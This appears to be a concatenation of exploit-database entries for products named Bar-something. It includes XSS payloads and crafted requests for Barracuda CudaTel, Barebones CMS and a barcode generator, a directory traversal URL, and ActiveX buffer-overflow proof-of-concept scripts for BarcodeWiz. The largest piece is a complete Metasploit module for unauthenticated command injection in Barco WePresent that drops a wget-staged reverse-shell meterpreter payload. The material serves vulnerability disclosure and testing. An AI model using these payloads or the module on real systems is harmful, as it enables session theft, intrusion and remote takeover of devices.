Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.
Barracuda CudaTel Communication Server 2.0.029.1 is vulnerable; other versions may also be affected.
<td class="detailTD">
<div style="float: left;" class="printedName">
"><iframe div="" <="" onload='alert("VL")' src="a">
</td><script type="text/javascript">extensions_register('extOp530748', 'extOp530748-ext144',
{"flag_super":"0","flag_locked":
"0","bbx_extension_rcd":"2012-02-16
11:21:48.105901","bbx_extension_block_begin":"2088","map"{"bbx_conference_id":null,"bbx_provider_gateway_id":null,"sort_name":
"\"><iframe src=a onload=alert(\"vl\")
<","bbx_valet_parking_id":null,"bbx_extension_entity_map_id":"82","bbx_extension_entity_
map_fallback_exten":null,"bbx_
extension_entity_map_metadata":null,"bbx_user_id":null,"bbx_router_id":"20","bbx_group_id":null,"bbx_callflow_id":null,"_force_
row_refresh":"0","show_name":"\"><[EXECUTION OF PERSISTENT SCRIPT CODE]
<","bbx_queue_id":null,"bbx_tdm_card_port_id":null,"flag_standalone":"1","bbx_auto_attendant_id":null,"bbx_extension_id_
forward":null},"bbx_extension_name":null,"bbx_domain_id":"6","bbx_extension_block_end":"2088","type_id":
{"id":"20","type":"router","col":"bbx_router_id"},"map_id":"82","flag_external":"0","flag_voicemail":"0","bbx_extension_value"
:"2088","ldap":0,"bbx_extension_rpd":"2012-02-16 11:21:49.06783","user_synced":null,"printed_name":"\"><[EXECUTION OF
PERSISTENT SCRIPT CODE]
<","bbx_extension_id":"144","group_synced":null,"type":"router","flag_auto_provision":"0"});</script>
source: https://www.securityfocus.com/bid/61353/info
Barracuda CudaTel is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Barracuda CudaTel 2.6.02.04 is vulnerable; other versions may also be affected.
http://www.example.com/gui/route/route?%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C
http://www.example.com/gui/route/route?_=1354073910062&bbx_outbound_route_flag_locked=%3C[CLIENT-SIDE SCRIPT
CODE!]%20%3C
http://www.example.com/ajax-html/queues_wall_stub.html?_=1354074247075%20%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C#
http://www.example.com/ajax-html/queues_wall_stub.html?_=1354074247075%20%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C#
source: https://www.securityfocus.com/bid/51156/info
Barracuda Control Center 620 is prone to an HTML injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
https://www.example.com/bcc/editdevices.jsp?device-type=spyware&selected-node=1&containerid=[IVE]
https://www.example.com/bcc/main.jsp?device-type=[IVE]
source: https://www.securityfocus.com/bid/60782/info
Barnraiser Prairie is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to access arbitrary images in the context of the application. This may aid in further attacks.
http://www.example.com/get_file.php?avatar=..&width=../../../../../../../../usr/share/apache2/icons/apache_pb.png
# Exploit Title: Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2023-06-03
# Exploit Author: tmrswrr
# Vendor Homepage: https://barebonescms.com/
# Software Link: https://github.com/cubiclesoft/barebones-cms/archive/master.zip
# Version: v2.0.2
# Tested : https://demo.barebonescms.com/
--- Description ---
1) Login admin panel and go to new story :
https://demo.barebonescms.com/sessions/127.0.0.1/moors-sluses/admin/?action=addeditasset&type=story&sec_t=241bac393bb576b2538613a18de8c01184323540
2) Click edit button and write your payload in the title field:
Payload: "><script>alert(1)</script>
3) After save change and will you see alert button
POST /sessions/127.0.0.1/moors-sluses/admin/ HTTP/1.1
Host: demo.barebonescms.com
Cookie: PHPSESSID=81ecf7072ed639fa2fda1347883265a4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 237
Origin: https://demo.barebonescms.com
Dnt: 1
Referer: https://demo.barebonescms.com/sessions/78.163.184.240/moors-sluses/admin/?action=addeditasset&id=1&type=story&lang=en-us&sec_t=241bac393bb576b2538613a18de8c01184323540
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
action=saveasset&id=1&revision=0&type=story&sec_t=a6adec1ffa60ca5adf4377df100719b952d3f596&lang=en-us&title=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&newtag=&publish_date=2023-06-03&publish_time=12%3A07+am&unpublish_date=&unpublish_time=
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/BARCODEWIZ-v6.7-ACTIVEX-COMPONENT-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec
Vendor:
=================
www.barcodewiz.com
Product:
=============
BarcodeWiz ActiveX Control < 6.7
BarCodeWiz OnLabel. Generates dynamic barcodes from your imported Excel, CSV, or Access files. Print auto incrementing barcodes;
Choose from hundreds of label layouts; Export as PDF or XPS.
Vulnerability Type:
===================
Buffer Overflow
CVE Reference:
==============
CVE-2018-5221
Security Issue:
================
BarcodeWiz.DLL BottomText and TopText propertys suffer from buffer overflow vulnerability resulting in (SEH) "Structured Exceptional Handler" overwrite .
This can be exploited by a remote attacker to potentially execute arbitrary attacker supplied code. User would have to visit a malicious webpage using
InternetExplorer where the exploit could be triggered.
SEH chain of main thread
Address SE handler
0018DAC0 kernel32.754E48F3
0018EE34 41414141
41414141 *** CORRUPT ENTRY ***
Exception Code: ACCESS_VIOLATION
Disasm: 2045665 MOV [EDX+ECX],AL (BarcodeWiz.DLL)
SEH Chain:
--------------------------------------------------
1 41414141
Called From Returns To
--------------------------------------------------
BarcodeWiz.2045665 BarcodeWiz.202FF50
BarcodeWiz.202FF50 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
Report for Clsid: {CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
Exploit/POC:
=============
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='VICTIM' />
<script language='vbscript'>
PAYLOAD=String(12308, "A")
VICTIM.BottomText = PAYLOAD
</script>
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
Vendor Notification: December 26, 2017
Vendor Acknowledgement: January 2, 2018
Vendor "updated version released this week." : January 2, 2018
January 6, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
source: https://www.securityfocus.com/bid/54701/info
BarCodeWiz ActiveX control is prone to a buffer-overflow vulnerability because it fails to sufficiently bounds-check user-supplied input.
An attacker may exploit this issue by enticing victims into opening a malicious webpage or HTML email that invokes the affected control.
Successful exploits will allow attackers to execute arbitrary code within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Failed exploit attempts will result in a denial-of-service condition.
BarCodeWiz 4.0.0.0 is vulnerable to this issue; other versions may be affected as well.
<html>
Exploit
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='poc'
/></object>
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\BarCodeWiz ActiveX
Trial\DLL\BarcodeWiz.dll"
prototype = "Property Let Barcode As String"
memberName = "Barcode"
progid = "BARCODEWIZLib.BarCodeWiz"
argCount = 1
arg1=String(14356, "A")
poc.Barcode = arg1
</script>
# Exploit Title: Barcodes generator 1.0 - 'name' Stored Cross Site Scripting
# Date: 10/12/2020
# Exploit Author: Nikhil Kumar
# Vendor Homepage: http://egavilanmedia.com/
# Software Link: http://egavilanmedia.com/barcodes-generator-using-php-mysql-and-jsbarcode-library/
# Version: 1.0
# Tested On: Ubuntu
1. Open the index.php page using following url
http://localhost/Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/index.php
click on the New Barcode
2. Intercept the request through burp suite
Put a payload on "name=" parameter
Payload :- abc"><script>alert("XSS")</script>
Malicious Request::
POST /Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/php/insert.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/index.php
Upgrade-Insecure-Requests: 1
name=abc"><script>alert("XSS")</script>
# Exploit Title: BarcodeOCR 19.3.6 - 'BarcodeOCR' Unquoted Service Path
# Discovery Date: 2020-07-31
# Response from BarcodeOCR Support: 08/03/2020
# Exploit Author: Daniel Bertoni
# Vendor Homepage: https://www.barcode-ocr.com/
# Version: 19.3.6
# Tested on: Windows Server 2016, Windows 10
# Find the Unquoted Service Path Vulnerability:
C:\wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
BarcodeOCR Auto BarcodeOCR C:\Program Files (x86)\BarcodeOCR\Service.exe
# Service info:
C:\sc qc CodeMeter.exe
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: BarcodeOCR
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files (x86)\BarcodeOCR\Service.exe
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : BarcodeOCR
DIPENDENZE :
SERVICE_START_NAME : LocalSystem
# Exploit:
A successful attempt to exploit this vulnerability could allow to execute code during startup or reboot with the elevated privileges.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => "Barco WePresent file_transfer.cgi Command Injection",
'Description' => %q(
This module exploits an unauthenticated remote command injection
vulnerability found in Barco WePresent and related OEM'ed products.
The vulnerability is triggered via an HTTP POST request to the
file_transfer.cgi endpoint.
),
'License' => MSF_LICENSE,
'Author' => 'Jacob Baines', # @Junior_Baines'
'References' =>
[
['CVE', '2019-3929'],
['EDB', '46786'],
['URL', 'https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c']
],
'DisclosureDate' => "Apr 30, 2019",
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_ARMLE],
'Privileged' => false,
'Targets' => [
['Unix In-Memory',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'Payload' => {
'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnetd' }
}],
['Linux Dropper',
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'CmdStagerFlavor' => ['printf', 'wget'],
'Type' => :linux_dropper]
],
'DefaultTarget' => 1,
'DefaultOptions' => {
'SSL' => true,
'RPORT' => 443,
'CMDSTAGER::FLAVOR' => 'printf',
'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
}))
end
def filter_bad_chars(cmd)
cmd.gsub!(/;/, 'Pa_Note')
cmd.gsub!(/\+/, 'Pa_Add')
cmd.gsub!(/&/, 'Pa_Amp')
return cmd
end
def send_command(cmd, timeout)
vars_post = {
file_transfer: 'new',
dir: "'#{filter_bad_chars(cmd)}'"
}
send_request_cgi({
'uri' => '/cgi-bin/file_transfer.cgi',
'method' => 'POST',
'vars_post' => vars_post
}, timeout)
end
def check
check_resp = send_command(";whoami;", 5)
unless check_resp
return CheckCode::Unknown('Connection failed.')
end
if check_resp.code == 200
check_resp.body.gsub!(/[\r\n]/, "")
if check_resp.body == "root"
return CheckCode::Vulnerable
end
end
CheckCode::Safe
end
def execute_command(cmd, _opts = {})
send_command(";(#{cmd})&", nil)
end
def exploit
case target['Type']
when :unix_memory
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager(linemax: 128)
end
end
end